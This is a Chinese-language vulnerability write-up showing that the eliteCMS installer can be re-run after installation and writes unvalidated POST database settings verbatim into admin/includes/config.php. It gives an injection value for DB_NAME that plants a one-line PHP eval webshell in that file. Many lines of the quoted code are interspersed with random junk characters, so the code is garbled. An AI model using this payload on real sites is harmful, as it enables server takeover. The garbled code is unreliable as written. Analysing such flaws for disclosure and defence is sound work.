eliteCMS 的安装程序在安装完成后未加锁定，导致攻击者可以再次访问安装程序地址重复执行安装。
另一个漏洞是安装程序可以直接将一句话后门写入 admin/includes/config.php。
我们来看代码：
...4 \3 b: Y. [: c, j5 o8 S- z
elseif ($_GET['step'] == "4") {
' c5 i1 R+ X# y2 C* u $file = "../admin/includes/config.php";2 `6 S3 u$ m5 Q+ ?) L; _# _. U
$write = "<?php\n";+ z: l( A/ T1 k1 t! e# k, p
$write .= "/**\n";
5 L5 x9 U0 j" V& U& k $write .= "*\n";( e4 Z; W$ o' o; _' D1 T
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
3 O4 V7 M- \% r' W. k& L4 @' Z9 i$ V2 M...略...
, b$ L) Z2 @7 A7 H8 u5 B6 A6 P $write .= "*\n";
! C6 F+ r8 e6 w- ^8 S! R, x( \ $write .= "*/\n";
8 }4 |) f1 a& B1 W% }! B, { $write .= "\n";
" y& k$ {, ?8 j# `& D. D( _ $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
3 I4 \3 z7 P; z/ y! {9 f $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n"; |! y1 J% Q* d9 J
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";+ u; |% o& i# D# h3 g
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
3 S/ \. \( ?9 l! Z# N) i! w6 @& e $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
! {8 B0 K: ^6 a! q) S! u5 b3 E $write .= "if (!\$connection) {\n";
; D# ]* h' o2 w X- ?% e9 R5 S $write .= " die(\"Database connection failed\" .mysql_error());\n";
d: L( X7 q3 m3 j3 ~# ] $write .= " \n";+ ~) k. s: i7 o( t) M
$write .= "} \n";
d7 K9 a8 x. U8 H3 y* n# s b2 K3 C $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
! ]& o5 p, b1 V' `! X+ A $write .= "if (!\$db_select) {\n";
9 ^% S& ^# w: n; b4 [' d$ t5 z $write .= " die(\"Database select failed\" .mysql_error());\n";
8 x9 e2 {6 l* W' F3 y! o $write .= " \n";$ K, S/ O ^4 C" o: K' [: Z+ ]3 x
$write .= "} \n";* ^7 k% P: C% E
$write .= "?>\n";
7 N7 m6 ?/ g" } 0 t7 F, x3 Y" `+ ? O
$writer = fopen($file, 'w');+ l4 e5 ]9 c$ W* o
...
再看代码：
// Installer: stash the database settings posted by the form in the session so
// the later step (step 4) can write them into admin/includes/config.php.
// The values are copied through exactly as received — nothing validates or
// escapes them here, and the config-writing step interpolates them verbatim
// into double-quoted PHP source, which is the weakness described above.
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $setting) {
    $_SESSION[$setting] = $_POST[$setting];
}
取值未作任何验证。
如果将数据库名（DB_NAME）的 POST 数据设为：
"?><?php eval($_POST[c]);?><?php2 }& l! c+ a3 g7 J3 L
由于该值会被原样拼接进 config.php 中的 define() 语句，这将导致一句话后门被写入 /admin/includes/config.php。